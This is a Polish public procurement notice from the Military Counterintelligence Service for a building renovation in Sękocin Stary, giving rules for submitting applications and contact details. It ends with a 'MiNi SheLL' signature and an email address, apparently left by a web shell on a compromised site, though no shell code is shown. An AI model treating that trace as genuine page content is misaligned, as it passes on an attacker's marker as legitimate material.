- nazwę i nr postępowania, tj. robota budowlana - Remont pomieszczeń w budynku nr 1 na terenie nieruchomości w Sękocinie Starym, oznaczenie sprawy: ZP-11-SKW-2015.
Na pierwszej stronie Wniosku należy umieścić pieczęć adresową Wykonawcy. 
Dla zapewnienia integralności i nienaruszalności wniosku zaleca się: 
a) parafowanie każdej strony wniosku przez osoby podpisujące wniosek; 
b) zszycie i ponumerowanie w sposób ciągły wszystkich stron wniosku. 
Ewentualne poprawki we wniosku powinny być naniesione czytelnie oraz opatrzone podpisem i datą przez osobę (osoby) podpisującą wniosek. Parafka (podpis) powinna być naniesiona w sposób umożliwiający identyfikację podpisu (np. wraz z imienną pieczątką osoby sporządzającej poprawkę). 
Wniosek musi być podpisany przez osoby uprawnione do reprezentowania Wykonawcy w szczególności w przypadku: 
a) osób prawnych sposób reprezentacji musi być zgodny z danymi zawartym w odpowiednim rejestrze sadowym; 
b) przedsiębiorcy będącego osobą fizyczną - przez osobę wpisana jako przedsiębiorca do ewidencji działalności gospodarczej; 
c) podpisania wniosku przez osobę upoważnioną, wniosek musi zawierać dokument pełnomocnictwa, z którego będzie wynikało umocowanie tej osoby do podpisywania i złożenia wniosku (ewentualnie w następnym etapie oferty i umowy), wystawione przez osoby uprawnione do reprezentowania podmiotu. Pełnomocnictwo winno być dołączone w formie oryginału lub kopii poświadczonej notarialnie, bądź przez jego wystawce; 
d) Wykonawców wspólnie ubiegających się o udzielenie zamówienia - przez osobę upoważnioną przez wszystkich Wykonawców (pełnomocnika). 

Wniosek należy złożyć w kopercie zaadresowanej na Biuro Administracyjne SKW, odpowiednio zabezpieczonej i opisanej - należy podać:
-  nazwę Wykonawcy, adres, tel. kontaktowe;
- dane Zamawiającego: Służba Kontrwywiadu Wojskowego, ul. W. Oczki 1, 00-909 Warszawa 60;
- nazwę i nr postępowania, tj. robota budowlana - Remont pomieszczeń w budynku nr 1 na terenie nieruchomości w Sękocinie Starym, oznaczenie sprawy: ZP-11-SKW-2015.

Konsekwencje złożenia wniosku niezgodnie z ww. opisem (np. potraktowanie wniosku jako zwykłej korespondencji i nie dostarczenie jej do miejsca składania wniosków w terminie określonym 
w ogłoszeniu) ponosi Wykonawca. 
W przypadku, gdy informacje zawarte we wniosku lub załączonych dokumentach stanowią tajemnicę przedsiębiorstwa w rozumieniu art. 11 ust. 4. ustawy o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2003 r., nr 153, poz. 1503 ze zm.), co do których Wykonawca zastrzega, że nie mogą być publicznie udostępnione, muszą być oznaczone klauzulą: Informacje stanowiące tajemnicę przedsiębiorstwa i dołączone odrębnie do wniosku. Zamawiający nie będzie ujawniał informacji stanowiących tajemnice przedsiębiorstwa, jeżeli wykonawca nie później niż w terminie składania wniosków o dopuszczenie do udziału w postępowaniu, zastrzegł, że nie mogą być one udostępniane oraz wykazał, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa.

INFORMACJE O SPOSOBIE POROZUMIEWANIA SIE ZAMAWIAJĄCEGO Z WYKONAWCAMI.

Zamawiający i Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje pisemnie, faksem lub drogą elektroniczną. 
Pytania i wątpliwości dotyczące składania wniosków o dopuszczenie do udziału w przetargu można kierować do Zamawiającego w języku polskim:
a)faksem - na nr 261 841 203;
b)drogą elektroniczną - na adres email: zamowienia@skw.gov.pl; 
c)w formie pisemnej - na adres: Sekretariat Biura Administracyjnego SKW, Zamówienia Publiczne, ul. W.Oczki 1, 00-909 Warszawa 60.

W przypadku Wykonawców wspólnie ubiegających się o zamówienie wszelka korespondencja dokonywana będzie wyłącznie z pełnomocnikiem.

Zgodnie z art. 38 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych 
(tj.: Dz. U. z 2013 r. poz. 907 z późn. zm.), Zamawiający nie ma obowiązku udzielania wyjaśnień dotyczących ogłoszenia.
OSOBY UPOWAŻNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCĄ
Andrzej Iwanicz, fax. nr 261 841 203.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com